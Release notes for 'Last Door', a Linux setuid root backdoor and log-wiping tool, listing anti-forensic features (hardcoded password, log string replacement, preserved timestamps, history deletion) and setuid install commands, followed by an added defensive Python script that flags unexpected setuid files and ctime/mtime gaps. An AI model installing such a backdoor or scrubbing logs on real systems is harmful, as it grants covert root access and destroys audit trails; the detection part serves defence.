Last Door is a utility written to wipe specific entries in arbitrary log files and, if setuid, it will also execute arbitrary commands without logging any history.
Last Door: Linux Root-Backdoor & Log-Cleaner ~r0ng
Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)
Release Dec 2012 -V1
For a full writeup of the program, please visit my blog, URL above.
[+] What is it?
It is a backdoor program which enables a non-root user to send commands to the system as root, and a log cleaner with several functions.
[+] Features?
- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
  - Search string replace with new string (e.g. change your ip in the logs)
  - Search string delete string
  - Search string delete line
  - Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
- User sets timer prior to running so they can log out/exit, and it will clean up after they have gone.
- If you don't log out prior to the process starting, the file search process will be displayed
- If you do log out prior to the process starting, this will allow your .bash_history to refresh and be included in the search (should you want to delete your ./LastDoor command for example).
[+] Compile/use?
- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)
- non-rootuser:~# /bin/LastDoor (run!)
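
For defenders, an added example (not part of Last Door or its author's code): two traits listed above leave filesystem evidence, the setuid bit set at install time and the restored modified date, because setting mtime back updates the inode change time (ctime). The name `audit_tree`, the baseline allowlist and the 60-second threshold are assumptions made for this example, and the sample files are constructed.

```python
import os
import stat


def audit_tree(root, setuid_baseline=frozenset(), max_skew=60.0):
    """Return sorted (path, reason) findings for regular files under root.

    Flags setuid files missing from setuid_baseline (an assumed allowlist
    of expected setuid paths) and files whose ctime is more than max_skew
    seconds newer than mtime, as happens when mtime is set back after a write.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:  # os.walk also yields hidden (dot) files
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID and path not in setuid_baseline:
                findings.append((path, "setuid, owner uid=%d" % st.st_uid))
            skew = st.st_ctime - st.st_mtime
            if skew > max_skew:
                findings.append((path, "ctime is %ds newer than mtime" % skew))
    return sorted(findings)


if __name__ == "__main__":
    import tempfile
    import time

    # Constructed sample: one untouched log, one whose mtime was set back.
    with tempfile.TemporaryDirectory() as d:
        for name in ("auth.log", ".bash_history"):
            with open(os.path.join(d, name), "w") as fh:
                fh.write("constructed sample line\n")
        old = time.time() - 3600
        os.utime(os.path.join(d, ".bash_history"), (old, old))
        for path, reason in audit_tree(d):
            print(path, "->", reason)
```

A ctime later than mtime is a lead rather than proof, since chmod, chown and renames during log rotation also update ctime; corroborate against copies of the logs shipped off-host.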